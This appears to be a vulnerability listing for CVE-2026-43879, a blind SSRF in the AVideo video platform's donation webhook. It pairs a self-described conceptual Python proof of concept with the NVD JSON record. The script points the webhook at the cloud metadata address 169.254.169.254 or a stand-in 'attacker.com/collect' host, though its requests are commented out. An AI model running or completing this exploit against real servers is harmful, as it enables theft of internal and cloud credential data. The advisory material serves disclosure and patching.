CVE-2026-43879

import requests import sys # This is a conceptual PoC for CVE-2026-43879 # It simulates the attacker setting a malicious webhook and triggering the donation. # Target configuration target_url = "http://localhost/avideo" # Replace with actual target attacker_controlled_server = "http://attacker.com/collect" internal_target = "http://169.254.169.254/latest/meta-data/" # Step 1: Authenticate and get session (Assumed credentials) session = requests.Session() login_payload = { "user": "attacker", "pass": "password", "rememberme": 0 } # login_resp = session.post(f"{target_url}/objects/userLogin.json.php", data=login_payload) # if login_resp.status_code != 200: # print("Login failed") # sys.exit(1) # Step 2: Configure the malicious donation webhook # The vulnerability allows setting the URL to internal hosts directly or via redirection webhook_config_url = f"{target_url}/plugin/CustomizeUser/donate.json.php" # In a real scenario, we need to find the exact endpoint to save the configuration. # Assuming an endpoint exists to update user preferences. payload = { "webhook": internal_target, # Direct internal hit # OR use redirection: "webhook": attacker_controlled_server (which 307 redirects to internal_target) } print(f"[+] Attempting to set webhook to: {internal_target}") # config_resp = session.post(webhook_config_url, data=payload) # Step 3: Trigger the donation to invoke the webhook # This causes the server to send a POST request to the webhook URL print("[+] Triggering donation to invoke SSRF...") # donate_resp = session.post(f"{target_url}/plugin/CustomizeUser/donate.json.php", data={"amount": 0.01}) print("[+] Check your internal server logs or attacker server for the request.")

{"cve": {"id": "CVE-2026-43879", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:12.390", "lastModified": "2026-05-11T22:22:12.390", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 29.0, an authenticated user can configure their own donation-notification webhook URL to point at internal/loopback/metadata hosts (e.g. http://127.0.0.1:8080/..., http://169.254.169.254/latest/..., RFC1918 addresses). When any other user (including a second account owned by the same attacker) donates even a trivial amount via plugin/CustomizeUser/donate.json.php, the AVideo server issues a curl POST to the attacker-supplied URL, resulting in a blind SSRF. The handler uses only isValidURL() (which is a format check) and does not call the codebase's own isSSRFSafeURL() helper. Additionally, CURLOPT_FOLLOWLOCATION is enabled with no per-hop revalidation, so even if the stored URL were validated, an HTTP 307 from an attacker-controlled host could redirect the POST to internal targets. Commit aaacd48f29f1ff71d1eb5fc81d37605f593cefa9 contains an updated fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/aaacd48f29f1ff71d1eb5fc81d37605f593cefa9", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-wp38-whx3-xffh", "source": "[email protected]"}]}}